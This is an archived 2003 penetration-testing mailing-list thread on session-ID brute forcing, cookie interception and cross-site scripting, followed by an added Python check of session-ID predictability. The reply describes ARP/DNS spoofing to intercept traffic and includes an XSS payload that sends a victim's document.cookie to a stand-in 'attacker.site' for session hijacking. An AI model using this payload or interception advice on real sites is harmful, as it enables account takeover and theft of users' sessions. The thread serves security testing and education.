RE: Proof of Concept Tool on Web Application Security

From: Dawes, Rogan (ZA - Johannesburg) (rdawes@deloitte.co.za)
Date: 04/11/03

    From: "Dawes, Rogan (ZA - Johannesburg)" <rdawes@deloitte.co.za>
    To: 'Indian Tiger' <indiantiger@mailandnews.com>, pen test <Pen-test@securityfocus.com>
    Date: Fri, 11 Apr 2003 09:11:45 +0200

    Hi,

    As far as brute forcing session ids goes, you could have a look at a post
    that I sent to the mobile code mailing list a while back for some
    techniques, and some code. That was focused on identifying the patterns in
    the cookie sequence, but once you have done that, it should be relatively
    easy to identify what the possibilities are for the next cookie, simply by
    reversing the algorithm - instead of calculating an integer from a character
    string, calculate a character string from the integer.

    http://www.pantek.com/library/general/lists/securityfocus.com/webappsec/msg00552.html

    Alternatively, take a look at iDefense's cookie and sessionid brute force
    tool. Sorry, I forget the name at the moment.

    The key to intercepting traffic is to understand the tools that are
    available, and put them to use in creative ways.

    For example, you could use the arp spoofing or DNS spoofing tools from the
    dsniff suite to redirect traffic on your local segment from the proxy to
    your own machine. Alternatively, investigate ettercap which could also
    possibly do this.

    Then run something like WebSleuth, Exodus
    (http://mysite.mweb.co.za/residents/rdawes/exodus.html), the dsniff webmitm,
    or your favourite proxy program to monitor traffic sent to the proxy, and
    alter it as you wish, prior to sending it off to the real proxy, or out via
    the router.

    Cross-site scripting is mostly useful to compromise the user's sessionid, to
    save you the effort of brute forcing it. E.g. if you could get the victim to
    execute the following code, you could simply collect their sessionid, and
    use it yourself.

    [script language=javascript]document.write("<img src='http://attacker.site/snarf?" + document.cookie + "'>")[/script]

    Alternatively, you could make them submit a form containing whatever
    information you want, that could possibly elevate your own privileges (if
    the victim is an administrator), etc.

    Have fun!

    Rogan
    -----Original Message-----
    From: Indian Tiger [mailto:indiantiger@mailandnews.com]
    Sent: 15 April 2003 08:06 PM
    To: pen test
    Subject: Proof of Concept Tool on Web Application Security

    Hi all,

    I have tried a lot to find any Proof of Concept Tool on Web Application
    Security but still I am not able to find a single one. Let me give some
    specific details.

    Session ID
    Generally the session ID is big enough and acts as an authentication token.
    Most of the time it only changes the last few digits, let's say only three
    digits from the end. Even though it only does this, it's very tough to guess
    these last three digits. I have made a testing site and tried but was not
    able to do that. I know the session ID is not the only authentication
    parameter; it can contain cookies, session tokens, etc. as well. I have
    tried Achilles, Web Sleuth, WebInspect, Spike Proxy, etc. I think at least
    they don't do such brute force. Is there any tool which does brute force on
    this and gives the session ID?

    Cookie Manipulation
    Several articles talk about cookie manipulation. Getting the cookies of
    others, even on a LAN, seems very tough or not possible as per my study on
    the Web. If an attacker is able to redirect another person's traffic to a
    proxy like Achilles or Web Sleuth, then he can perform attacks. But nobody
    is going to allow changing his proxy setting and sending his output through
    the attacker (proxy). Is there any tool which can give access to or
    manipulate the cookie remotely?

    This manipulation can also be achieved if an attacker can put his proxy (Web
    Sleuth) on an intermediate router/proxy. One example: I am accessing Hotmail,
    and on my ISP's router/proxy an attacker installs a tool like Web Sleuth. But
    again the question comes: a router works on OSI layer 3, so the attacker
    can't put a tool like Web Sleuth there. If the intermediate hop is a proxy,
    which is at the application level, there should be some tool which can be
    placed here.

    XSS
    Cross-site scripting has to use client-side scripting only. What could be
    the maximum impact of this? Can an attacker format a machine or steal data
    by this? If yes, how?

    Please also tell me of any other proof of concept tool on web application
    security. I read the OWASP guides, WebGoat and some more to understand these
    three things deeply and develop a proof of concept tool, but had no success
    except hidden field manipulation. Please recommend some good guides on this.

    Any help on this would be highly appreciated.

    Thanking You.
    Sincerely,

    Indian Tiger, CISSP

    --------------------------------------------------------------
    Costs are climbing and complaints are rising
    as SPAM overloads your e-mail servers and Inboxes
    SurfControl E-mail Filter puts the brakes on spam & viruses
    and gives you the reports to prove it.
    http://www.securityfocus.com/SurfControl-pen-test2
    Download a free trial and see just
    what's going in and out of your organization.
    --------------------------------------------------------------

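To put Rogan's "an integer from a character string, then a character string from the integer" idea, and the original question about IDs that only change their last three digits, into concrete form: the following Python check is an added example written for this page, not code from either poster or from any of the tools named, and is intended for assessing the session IDs issued by your own application. The hex alphabet, the fixed prefix and the three sample sets are constructed assumptions.

```python
import secrets
import string

HEX = string.hexdigits[:16]   # alphabet assumed for the sampled IDs (hex)

def to_int(session_id, alphabet=HEX):
    """'An integer from a character string': read the ID as a base-16 number."""
    n = 0
    for ch in session_id.lower():
        n = n * len(alphabet) + alphabet.index(ch)
    return n

def from_int(n, width, alphabet=HEX):
    """The reverse mapping: a fixed-width string from an integer."""
    out = []
    for _ in range(width):
        n, r = divmod(n, len(alphabet))
        out.append(alphabet[r])
    return "".join(reversed(out))

def varying_positions(ids):
    """Character positions whose value differs across the samples."""
    return [i for i in range(len(ids[0])) if len({s[i] for s in ids}) > 1]

def assess(ids):
    """Return (verdict, bits): bits is a generous upper bound of 4 bits per
    varying hex position; a constant delta between samples means a counter."""
    nums = [to_int(s) for s in ids]
    deltas = {b - a for a, b in zip(nums, nums[1:])}
    bits = 4 * len(varying_positions(ids))
    if len(deltas) == 1:
        return "sequential", bits
    return ("weak" if bits < 64 else "ok"), bits

def next_if_sequential(ids):
    """Counter samples make the next ID computable; that alone fails the check."""
    if assess(ids)[0] != "sequential":
        return None
    nums = [to_int(s) for s in ids]
    return from_int(nums[-1] + (nums[-1] - nums[-2]), len(ids[-1]))

# Constructed samples (not captured from any real site):
PREFIX = "a3f9c2e0b7d41"                                   # 13 fixed chars
SEQUENTIAL = [PREFIX + format(0x100 + 17 * i, "03x") for i in range(6)]
WEAK = [PREFIX + s for s in ("3a1", "c07", "58e", "f42", "19b", "e60")]
RANDOM = [secrets.token_hex(8) for _ in range(6)]          # 128-bit CSPRNG IDs
if __name__ == "__main__":
    for name, ids in (("sequential", SEQUENTIAL), ("weak", WEAK), ("random", RANDOM)):
        print(name, assess(ids), next_if_sequential(ids))
```

The RANDOM set shows what a sound generator looks like under the same check: every position varies and no delta repeats, so nothing about the next ID can be inferred from the sample.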


